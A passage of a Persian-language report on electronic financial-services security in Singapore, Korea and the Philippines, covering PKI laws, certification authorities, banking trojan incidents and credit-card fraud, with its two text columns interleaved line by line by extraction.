‫ﻧﺸﺪﻩ ﺑﻮﺩ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ‬ ‫)ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ‪.‬‬
‫ﻧﺸﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ‬ ‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ ‪%۵۰‬‬ ‫•‬
‫ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ‪.‬‬ ‫ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬ ‫ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ‬ ‫ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ‬
‫)‪ (PKI‬ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪" .‬ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ‬
‫ﺍﺳﺖ‪ .‬ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ‬
‫ﺳﺎﻝ ‪ (۱۹۹۹‬ﻣﺴﺌﻮﻟﻴﺖ ‪ PKI‬ﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ‬ ‫ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ‪ ۴‬ﻣﻴﻠﻴﻮﻧﻲ‪ ،‬ﺗﻘﺮﻳﺒﹰﺎ ‪%۲۵‬‬
‫ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ ‪ PKI‬ﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﻣﺮﺍﻛـﺰ‬ ‫ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ‪.‬‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ٢٣١‬ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ‪.‬‬
‫ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ‬ ‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ )‪ ٢٣٢(KISA‬ﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ‬ ‫‪ %۵۰‬ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ‪ .‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ‪ ،‬ﻭ ﺍﻧﺠـﺎﻡ‬ ‫ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ ‪ PKI‬ﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ‬ ‫ﺭﺷﺪ ﻧﻴﺴﺖ‪ ،‬ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ‪ .‬ﺧـﺪﻣﺎﺕ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬ ‫ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ‬ ‫ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ‬ ‫ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ‪.‬‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ‪ ،‬ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ‬ ‫ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ‪ ،‬ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ‬
‫ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ‬
‫ﺗﻘﺮﻳﺒﹰﺎ ‪ ۱۰۰‬ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ‪ ۱۹۹۶‬ﻭ ‪۱۹۹۷‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺎ‬ ‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ‪ ۵,۰۰۰‬ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ‬
‫ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ‪ ،‬ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ‬ ‫ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‪ .‬ﺍﮔﺮﭼـﻪ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻣﺎ‬ ‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ‬
‫ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ‪ :‬ﺍﺯ ‪۳۶‬‬ ‫)ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬ ‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ‬
‫ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ‬ ‫ﻣﻲﻛﻨﻨﺪ‪:‬‬
‫ﺷﻤﺮﺩ‪:‬‬
‫ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ‬ ‫‪.۱‬‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ ‪ - ۱۹۹۷‬ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ‬ ‫‪.۱‬‬ ‫ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ‪ .‬ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ‬
‫ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ‪ -‬ﺷﺮﻭﻉ ﺷﺪ‪ .‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪،‬‬
‫ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ‬
‫ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ‪.‬‬
‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ‬
‫ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ‬ ‫‪.۲‬‬
‫ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ‪.‬‬
‫ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻳﻤﻦ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ‬
‫ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﺗﺠﺎﺭﺕ ﺩﭼﺎﺭ ﺗﺄﺧﻴﺮ ﻳﺎ ﮔﺮﻓﺘﺎﺭ ﺩﺭﺩﺳﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻮﻧﺪ‪.‬‬
‫)ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻳﻚ ﺣﺎﺩﺛﺔ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻛﺮﻩ ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺭﺍ ﺩﮔﺮﮔـﻮﻥ ﺳـﺎﺧﺖ‪ .‬ﺩﺭ ﻣـﺎﻩ‬
‫ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ‪،‬‬ ‫‪.۲‬‬
‫ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ‬
‫‪231 Certification Authorities‬‬
‫‪232 Korean Information Security Agency‬‬
‫‪٢١٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻲ ﻓﻬﻢ ﻭ ﻭﺍﻛﻨﺶ ﻣﺆﺛﺮ ﺑﻪ ﺣﻮﺍﺩﺙ‬‫ﻫﻤﭽﻨﻴﻦ ﻇﺮﻓﻴﺖ ﻗﺪﺭﺕ ﻗﺎﻧﻮﻧ ﹺ‬ ‫ﺁﮔﻮﺳــﺖ ﺳــﺎﻝ ﮔﺬﺷــﺘﻪ ﭼﻨــﺪ ﺷــﺮﻛﺖ ﻭﺍﺳــﻄﻪﺍﻱ ﺣــﺴﺎﺑﻬﺎﻱ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑﻪ ﻣﻨﺼﺔ ﻇﻬﻮﺭ ﺭﺳـﺎﻧﺪ ﻭ ﺩﺭ ﻧﺘﻴﺠـﺔ ﻳـﻚ‬ ‫ﻏﻴﺮﻓﻌــﺎﻝ ﻭ ﻣــﺴﻜﻮﺗﻲ ﺭﺍ ﻳﺎﻓﺘﻨــﺪ ﻛــﻪ ﺗﻨﻬــﺎ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣﺔ ﺁﻣﻮﺯﺵ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻭﻟﺖ ﺑﻪ ﺍﺟﺮﺍ ﮔﺬﺍﺷﺘﻪ ﺷﺪ‬ ‫ﻛﺎﺭﻫــﺎﻱ ﺧــﻮﺩ ﺣــﺪﻭﺩ ‪ ۲۰‬ﻣﻴﻠﻴــﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜــﺎ ﺳــﻬﺎﻡ ﺍﺯ‬
‫ﻭ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺩﺭ ﺍﻳﻦ ﻋﺮﺻﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ‬ ‫ﺳـﺮﻣﺎﻳﻪﮔــﺬﺍﺭﺍﻥ ﺧﺮﻳـﺪﻩ ﺑﻮﺩﻧــﺪ‪ .‬ﺩﺭ ﻭﺍﻛــﻨﺶ ﺑـﻪ ﺍﻳــﻦ ﻣــﺴﺌﻠﻪ‪،‬‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺳﺎﻳﺒﺮ‪ ٢٣٤‬ﺭﺍ ﺍﺯ ﺩﺍﻳﺮﺓ ﺗﺼﻮﻳﺐ ﮔﺬﺭﺍﻧﺪ‪.‬‬ ‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻓـﺰﺍﻳﺶ ﻳﺎﻓـﺖ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺟﺒﺎﺭ ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺩﺭ ﺍﻭﻝ ﺩﺳﺎﻣﺒﺮ ﺳﺎﻝ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ‬
‫‪ ،۲۰۰۲‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺧﺼﻮﺻﻲ "ﻓﺎﻗﺪ ﺍﻋﺘﺒـﺎﺭ" ﺍﻋـﻼﻡ ﺷـﺪﻧﺪ ﻭ ﺍﺯ‬
‫ﻞ‬
‫ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﻴﻠﻴﭙﻴﻦ )ﻣﺜﻞ ﻫﺮ ﻛﺸﻮﺭ ﺩﻳﮕﺮﻱ( ﺑﻪ ﻳﻚ ﻣﻌـﻀ ﹺ‬
‫ﺍﺳﺎﺳﻲ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺩﺍﺭﺍﻱ ‪ ۲‬ﺗـﺎ ‪ ۳‬ﻣﻴﻠﻴـﻮﻥ‬ ‫ﺁﻥ ﭘﺲ ﺗﻨﻬﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫)‪ ٢٣٣(LCAs‬ﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻣﻌﺘﺒﺮ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻣﺪﻧﺪ ﻭ ﺗﺎ ﻣﺎﻩ‬
‫ﺩﺍﺭﻧــﺪﺓ ﻛــﺎﺭﺕ ﺍﻋﺘﺒــﺎﺭﻱ ﺍﺳــﺖ ﻭ ﺣــﺪﻭﺩ ‪ ۱۷‬ﺑﺎﻧــﻚ‪ ،‬ﺧــﺪﻣﺎﺕ‬
‫ﻣﻲ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻧﻴﺰ ﻫﻤﺔ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻣﺠﺪﺩ ﻗـﺮﺍﺭ‬
‫ﺍﻋﺘﺒﺎﺭﻱ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺳﺎﻝ ﭼﻨﺪﻳﻦ ﻣﻴﻠﻴـﻮﻥ‬
‫ﻣﻲ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺿﺮﻭﺭﻱ ﺷـﺪ ﻛـﻪ ﻫﻤـﺔ ﺷـﺮﻛﺘﻬﺎﻱ ﻭﺍﺳـﻄﻪﺍﻱ ﺍﺯ‬
‫ﺗﺒﺎﺩﻝ ﺗﺠﺎﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ‪ .‬ﺗﺨﻤﻴﻦ ﺯﺩﻩ ﺷﺪﻩ ﻛﻪ‬
‫ﻧﻮﺍﻣﺒﺮ ‪ ۲۰۰۲‬ﻭ ﻣﺆﺳﺴﺎﺕ ﻛﻮﭼﻜﺘﺮ ﺍﺯ ﮊﺍﻧﻮﻳﻪ ‪ ۲۰۰۳‬ﺑـﻪ ﺑﻌـﺪ‪ ،‬ﺩﺭ‬
‫ﺣﺪﻭﺩ ‪ ۴۰۰‬ﻣﻴﻠﻴﻮﻥ ﭘﺰﻭ )ﻣﻌﺎﺩﻝ ‪ ۸‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ( ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺗﺄﻳﻴﺪﺷﺪﺓ ﺻﺪﻭﺭ ﮔـﻮﺍﻫﻲ‬
‫ﻣﺎﻟﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺻﻮﺭﺕﮔﺮﻓﺘﻪ ﺍﺯ ﻛﺎﺭﺗﻬـﺎﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﻋﺘﺒــﺎﺭﻱ ﻧــﺴﺒﺖ ﺩﺍﺩ‪ .‬ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﺧــﻮﺩﭘﺮﺩﺍﺯ ﻧﻴــﺰ ﺑﻄــﻮﺭ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺳﺮﺍﺳـﺮ ﻛـﺸﻮﺭ ﭼﻴـﺰﻱ‬ ‫ﺳﻨﮕﺎﭘﻮﺭ ﺑﻨﺎ ﺩﺍﺷﺖ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺧﻂﻣﺸﻲﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ‬
‫ﺣﺪﻭﺩ ‪ ۱۰‬ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻱ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﻨﺪ‪ .‬ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﺮ‬
‫ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻣﻔﻴﺪ ﺻﻨﻌﺖ‪ ،‬ﺑﺎ ﻛﻤﻚ ﻧﻬﺎﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ‪ ،‬ﻭ‬
‫ﺳﻮﻣﻴﻦ ﻣﻮﺿﻮﻉ ﺑﺤﺚ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻳـﺎﺯﺩﻫﻢ ﺳـﭙﺘﺎﻣﺒﺮ ﺑﺎﻧﻜﻬـﺎ ﺭﺍ‬
‫ﺑﺮ ﻣﺒﻨﺎﻱ ﭼﻜﻴﺪﺓ ﺟﻠﺴﺎﺕ ﻣﺨﺘﻠﻒ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎﻱ ﻓﻌﺎﻝ ﺻـﻨﻌﺘﻲ‬
‫ﻣﺠﺒﻮﺭ ﺳﺎﺧﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﺗـﻼﺵ‬
